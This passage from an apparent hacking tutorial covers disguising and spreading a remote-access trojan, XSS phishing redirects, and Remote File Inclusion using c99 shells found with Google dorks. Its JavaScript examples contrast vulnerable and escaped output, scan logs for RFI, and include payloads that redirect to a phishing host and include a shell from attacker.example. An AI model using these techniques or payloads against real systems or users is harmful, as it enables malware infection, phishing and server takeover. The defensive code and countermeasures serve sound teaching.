Remember, a trojan can only be executed if a human runs it. So by binding it with a legitimate file like a text document or a game, the chances of someone clicking on it go up. Check the bind option and select a file to bind it to. In the example I will use an ordinary text document. Click on the Server Extensions button to continue. Here you choose what kind of server file to generate. Click on Server Icon to continue. Here you choose an icon for your server file.
The icon helps mask what the file actually is. For my example I will choose the regular text document icon, since my server is bound to a text document. Finally click on Create Server to, you guessed it, create the server file. Below is what my server file looks like. A hacker could also put it up as a torrent, pretending it is something else, like the latest game that just came out, to get people to download it.
Now I will show you what happens when a victim runs the server on his computer and what the hacker can do next. Once I run it, the trojan is installed onto my computer in the background. The hacker then gets a message telling him that I was infected.
He would then connect to my computer by typing in my IP address and port and clicking Connect. He will be asked for the password he set when he created the server. Once he types it in, he is connected to my computer and has full control over it.
Now the hacker has a lot of options to choose from, as you can see on the right. He has access to all my files; he can shut down my PC, get all the saved passwords off my computer, send a message to my screen, format my whole hard drive, take a screenshot of my computer, and much more. The image below shows the message I would get on my screen if the hacker chose to message me. Below is an image of my task bar after the hacker clicks on Hide Start Button.
Below is an image of what the hacker would see if he chose to take a screenshot of the victim's screen. Many skilled hackers write their own viruses and trojans that can easily bypass anti-virus programs.
Countermeasures
There are a couple of things you can do to protect yourself from the malware discussed in this chapter. Make sure you have good, up-to-date anti-virus software installed on your computer, and if it has an automatic update option, make sure it is enabled. Make sure you have a firewall installed on your computer and that it is actually enabled.
Firewalls protect against unauthorized inbound and outbound connections.
Most websites today are dynamic, and many of the web applications that run these dynamic websites have security flaws. In this chapter we will discuss some of the most popular forms of attack against web applications.
Cross Site Scripting (XSS)
Local — Local XSS attacks are by far the rarest and the hardest to pull off. This attack requires an exploit for a browser vulnerability. With this type of attack, the hacker can install worms, spambots, and backdoors onto your computer.
Non-persistent — Non-persistent attacks deliver the attacker's JavaScript (a scripting language used for client-side web development) through a crafted URL whose contents the vulnerable site reflects back into its page. They are only activated when the user visits the URL crafted by the attacker.
Persistent — Persistent attacks are usually used against web applications like guest books, forums, and shout boxes, where the injected script is stored and served to every visitor.
To test for the vulnerability, first insert some HTML into the parameter, then some JavaScript, such as an alert. As you can see, these examples are non-persistent: the script runs only for whoever visits the crafted URL. If a hacker found a guestbook or something like it that was vulnerable, he would be able to make the attack persistent, and everyone who visits the page would get the above alert if it was part of his comment. Hackers knowledgeable in JavaScript and PHP can craft advanced XSS attacks to steal your cookies and spread XSS worms, but to show you something more realistic than the examples above, I will show you how a hacker could use XSS to help with phishing.
If he was able to find an XSS vulnerability anywhere on the website, he would be able to craft a link pointing to the legitimate website that redirects to his phishing website.
In the URL, the hacker would replace the value of the vulnerable parameter with JavaScript that redirects the browser to his phishing page. Now when you go to the finished link, the legitimate site redirects to the phishing website. Next the hacker would encode the URL to make it look more legitimate and less suspicious. Once the victim sees that the link points to the legitimate website, he is more likely to fall for the phishing attack.
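The reflected and stored cases above, and the encoded phishing link, as an added JavaScript example that is not part of the original tutorial. It models a search page and a guestbook rendered two ways, vulnerable and with HTML output encoding, so you can see exactly what the server sends back in each case. The hostnames (legit.example, phishing.example), the parameter name q and the payloads are made up for illustration; nothing here is taken from a real site.

```javascript
// Added example, not code from the original tutorial: a tiny search page and
// guestbook rendered two ways, to show reflected (non-persistent) and stored
// (persistent) XSS and the output encoding that stops both. Hostnames,
// parameter names and payloads are made up for illustration.

// Vulnerable: the query string value is concatenated straight into HTML.
function renderSearchVulnerable(query) {
  return `<h1>Results for ${query}</h1>`;
}

// Escape the characters that can switch HTML context. Applied at output time,
// this turns attacker markup back into inert text.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

function renderSearchSafe(query) {
  return `<h1>Results for ${escapeHtml(query)}</h1>`;
}

// Stored case: a guestbook keeps every comment and replays it to all visitors.
const guestbook = [];
function postComment(text) {
  guestbook.push(text);
}
function renderGuestbookVulnerable() {
  return guestbook.map((c) => `<li>${c}</li>`).join('');
}
function renderGuestbookSafe() {
  return guestbook.map((c) => `<li>${escapeHtml(c)}</li>`).join('');
}

// The crafted link from the text: the payload is URL-encoded so the link still
// points at the legitimate host and looks less suspicious in an e-mail.
function craftLink(base, param, payload) {
  return `${base}?${param}=${encodeURIComponent(payload)}`;
}

// Server side: decode the parameter the way any web framework would, which
// hands the original payload back to the page.
function paramFromLink(link, param) {
  return new URL(link).searchParams.get(param);
}

// Crude detector used in the checks below: is there a live <script> tag?
function containsScript(html) {
  return /<script\b/i.test(html);
}

// Constructed payloads: the alert from the text and a phishing redirect.
const ALERT_PAYLOAD = '<script>alert("XSS")</script>';
const PHISH_PAYLOAD = '<script>location="http://phishing.example/login"</script>';

console.log('crafted link:', craftLink('http://legit.example/search', 'q', PHISH_PAYLOAD));
console.log('vulnerable:', renderSearchVulnerable(PHISH_PAYLOAD));
console.log('safe:', renderSearchSafe(PHISH_PAYLOAD));
```

The encoded link decodes back to the original payload on the server, which is why "encoding to look legitimate" costs the attacker nothing; the only thing that neutralises it is escaping at output time, as renderSearchSafe and renderGuestbookSafe do.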
Remote File Inclusion
Remote File Inclusion (RFI) occurs when a remote file, usually a shell (a graphical interface for browsing files and running your own code on a server), is included into a website. This allows the hacker to execute server-side commands as the user the web server runs as, and to access files on the server.
With this power the hacker can continue on to use local exploits to escalate his privileges and take over the whole system. Note that since PHP 5.2 the allow_url_include directive is off by default, so remote inclusion only works on servers where it has been turned on or that run older versions. Many hackers use Google dorks to locate scripts that take a page name from the URL and include it. To test one, the hacker replaces the page name with the URL of the Google homepage; if the Google homepage shows up inside the website, the hacker knows the site is vulnerable and would continue to include a shell.
A couple of the most popular shells are c99 and r57. A hacker would either upload them to a server he controls or just use a Google dork to locate copies already online and include them. To find a shell the hacker would search Google for: inurl:c99 This will display many websites with the shell already up and ready to be included.
At the end of the URL make sure to add a question mark. If the vulnerable script appends something (such as a file extension) to the parameter, the question mark turns that suffix into a query string for the remote server, which simply ignores it. Hackers also search public vulnerability databases for scripts known to be vulnerable to RFI. If the hacker succeeds in getting the server to parse the shell, he will be presented with a screen similar to the following: The shell displays information about the remote server and lists the files and directories on it.
The hacker would next find a way to gain root privileges on the system. He can do this by uploading and running local exploits against the server.
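The include pattern, the trailing question mark trick and the Google-homepage test described above, as an added JavaScript example that is not part of the original tutorial. It models the classic PHP pattern include($_GET['page'] . '.php') to show what the vulnerable server ends up fetching, what an allowlisted include looks like instead, and how to pick RFI attempts out of an access log. The hostnames (attacker.example), the page names in the allowlist and the log lines are all constructed for illustration.

```javascript
// Added example, not code from the original tutorial. It models the classic
// PHP pattern  include($_GET['page'] . '.php')  in JavaScript to show why a
// trailing '?' on the attacker's URL defeats the appended suffix, what a safe
// include routine looks like, and how to spot RFI attempts in an access log.
// All hostnames and log lines are constructed for illustration.

const INCLUDE_SUFFIX = '.php';

// Vulnerable: the string the server would try to include, suffix appended.
function includeTargetVulnerable(page) {
  return page + INCLUDE_SUFFIX;
}

// For a remote target, the path the attacker's server actually receives:
// everything from the first '?' on (including the appended '.php') is query
// string, which a static file host simply ignores.
function remotePathSeen(target) {
  return new URL(target).pathname;
}

// Safe: accept only a bare name from an allowlist, never a URL or a path.
const ALLOWED_PAGES = new Set(['home', 'about', 'contact']);
function includeTargetSafe(page) {
  if (typeof page !== 'string' || !/^[a-z0-9_]+$/i.test(page)) {
    throw new Error('invalid page name');
  }
  if (!ALLOWED_PAGES.has(page)) {
    throw new Error('page not allowed');
  }
  return `pages/${page}${INCLUDE_SUFFIX}`;
}

// Does a parameter value look like a remote include? Covers the URL schemes
// PHP's include() can fetch plus scheme-relative '//host' forms.
function looksLikeRfi(value) {
  return /^(https?|ftps?|php|data|expect):/i.test(value) || /^\/\//.test(value);
}

// Constructed access-log lines (not real traffic): a normal request, the
// Google-homepage test from the text, and an attempt to include a shell.
const SAMPLE_LOG = [
  '10.0.0.5 - - [01/Jan/2010:10:00:00 +0000] "GET /index.php?page=home HTTP/1.1" 200 512',
  '10.0.0.9 - - [01/Jan/2010:10:00:01 +0000] "GET /index.php?page=http://www.google.com/? HTTP/1.1" 200 8192',
  '10.0.0.9 - - [01/Jan/2010:10:00:05 +0000] "GET /index.php?page=http://attacker.example/c99.txt? HTTP/1.1" 200 40960',
];

// Scan log lines and return every query parameter that looks like an RFI.
function findRfiAttempts(lines) {
  const hits = [];
  for (const line of lines) {
    const m = /"GET (\S+) HTTP\//.exec(line);
    if (!m) continue;
    const params = new URL(m[1], 'http://localhost').searchParams;
    for (const [name, value] of params) {
      if (looksLikeRfi(value)) hits.push({ param: name, value });
    }
  }
  return hits;
}

console.log('server fetches:', includeTargetVulnerable('http://attacker.example/c99.txt?'));
console.log('attacker host sees path:', remotePathSeen(includeTargetVulnerable('http://attacker.example/c99.txt?')));
console.log('suspicious requests:', findRfiAttempts(SAMPLE_LOG));
```

The allowlist is the real fix: a regex that rejects URLs is easy to get wrong (note that "php://input" and "data:" also satisfy include), whereas mapping a short token to a fixed file path leaves nothing for the attacker to control. The log scan is the same check run the other way round, useful when reviewing an old server for signs that someone tried the Google-homepage test.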